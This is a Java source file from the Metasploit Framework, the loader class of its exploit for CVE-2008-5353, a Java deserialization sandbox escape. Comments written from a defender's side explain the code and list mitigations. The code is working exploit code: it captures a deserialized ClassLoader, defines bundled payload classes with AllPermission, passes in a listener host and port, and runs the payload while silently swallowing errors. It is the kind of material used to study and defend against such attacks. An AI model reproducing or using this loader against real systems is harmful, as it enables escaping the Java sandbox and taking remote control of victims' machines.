GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2008-5353/src/msf/x/LoaderX.java
// This is heavily based off Fuller's Loader
package msf.x;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.net.URL;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.lang.reflect.Field;
/**
 * Serializable {@link ClassLoader} subclass from the proof-of-concept filed under
 * CVE-2008-5353 (per this file's path in the repository).
 *
 * <p>Reviewer notes, written from the defender's side:
 * <ul>
 *   <li>A type that is both a {@code ClassLoader} and {@code Serializable} is a strong
 *       review and detection signal on its own. Creating a class loader is normally
 *       gated by {@code SecurityManager.checkCreateClassLoader()}; how an instance of
 *       this class comes to exist despite that gate is not shown in this file. The
 *       comment on {@code serialVersionUID} indicates that a separately prepared
 *       serialized object is involved.</li>
 *   <li>{@code readObject} publishes the freshly deserialized instance through a public
 *       static field, which keeps it reachable from any code afterwards, independent of
 *       what the deserializing caller does with the object it gets back.</li>
 *   <li>{@code bootstrapPayload} defines classes inside a {@link ProtectionDomain} that
 *       statically carries {@link AllPermission}, so the classes it defines are not
 *       limited by the permissions of the code that called it.</li>
 *   <li>Mitigation is on the runtime side: keep the JRE patched, do not natively
 *       deserialize untrusted data, and on Java 9+ restrict accepted classes with
 *       {@code java.io.ObjectInputFilter}.</li>
 * </ul>
 */
public class LoaderX extends ClassLoader implements Serializable {
    // Fixed on purpose: per the original author, this value has to equal the UID
    // recorded in the pre-built serialized object that accompanies this class.
    private static final long serialVersionUID = 6812622870313961944L;

    // Set by readObject(); null until an instance has been deserialized.
    public static LoaderX instance = null;

    /**
     * Writes this object using default serialization only.
     *
     * @param oos stream the object is written to
     */
    private void writeObject( ObjectOutputStream oos ) throws IOException, ClassNotFoundException {
        oos.defaultWriteObject();
    }

    /**
     * Deserialization hook: records this instance in {@link #instance} and then performs
     * default field restoration.
     *
     * @param ois stream the object is being read from
     */
    private void readObject( ObjectInputStream ois ) throws IOException, ClassNotFoundException {
        // The static reference is stored before any stream data is consumed, so it is
        // set even if defaultReadObject() goes on to throw.
        LoaderX.instance = this;

        ois.defaultReadObject();
    }

    /**
     * Defines the two {@code PayloadX} classes from class files bundled as resources,
     * copies the arguments into public fields of {@code PayloadX}, and instantiates it.
     *
     * <p>Every failure is swallowed by the catch-all at the end, so the declared
     * {@code IOException} never actually reaches the caller and the caller cannot tell
     * whether anything was defined.
     *
     * @param data  value stored in the {@code data} field (the original comments call it
     *              the native payload data)
     * @param jar   value stored in the {@code jar} field
     * @param lhost value stored in the {@code lhost} field
     * @param lport value stored in the {@code lport} field
     * @throws IOException declared for callers, but not propagated by this implementation
     */
    public void bootstrapPayload( String data, String jar, String lhost, int lport ) throws IOException {
        final String[] classNames = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };
        final String[] classPaths = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };
        Class<?> lastDefined = null;

        try {
            int i = 0;
            while( i < classNames.length ) {
                ByteArrayOutputStream collected = new ByteArrayOutputStream();
                byte[] chunk = new byte[8192];

                // Pull the class file out of the jar this loader was itself loaded from.
                InputStream in = getClass().getResourceAsStream( classPaths[i] );
                for( int n = in.read( chunk ) ; n > 0 ; n = in.read( chunk ) ) {
                    collected.write( chunk, 0, n );
                }
                byte[] classBytes = collected.toByteArray();

                // Unsigned code source paired with a permission set holding AllPermission:
                // this is the line pair a reviewer should look for, since the domain's
                // permissions are fixed here rather than taken from the installed policy.
                CodeSource origin = new CodeSource( new URL( "file:///" ), new Certificate[0] );
                Permissions everything = new Permissions();
                everything.add( new AllPermission() );
                ProtectionDomain domain = new ProtectionDomain( origin, everything );

                lastDefined = defineClass( classNames[i], classBytes, 0, classBytes.length, domain );
                i++;
            }

            // After the loop the variable holds the second entry, msf.x.PayloadX.
            if( lastDefined == null ) {
                return;
            }

            // getField() only resolves public fields; all four lookups happen before
            // anything is instantiated.
            Field dataField = lastDefined.getField( "data" );
            Field jarField = lastDefined.getField( "jar" );
            Field lhostField = lastDefined.getField( "lhost" );
            Field lportField = lastDefined.getField( "lport" );

            // First instance: only used as the target for the field writes.
            // NOTE(review): presumably these are static fields, otherwise the second
            // instance below would not see the values - confirm against PayloadX.
            Object configured = lastDefined.newInstance();
            dataField.set( configured, data );
            jarField.set( configured, jar );
            lhostField.set( configured, lhost );
            lportField.setInt( configured, lport );

            // Second instance: per the original comment, constructing it is what runs the
            // payload; PayloadX itself is not part of this file.
            lastDefined.newInstance();
        }
        catch( Exception ignored ) {
            // Deliberately silent in the original: no failure is reported anywhere.
        }
    }
}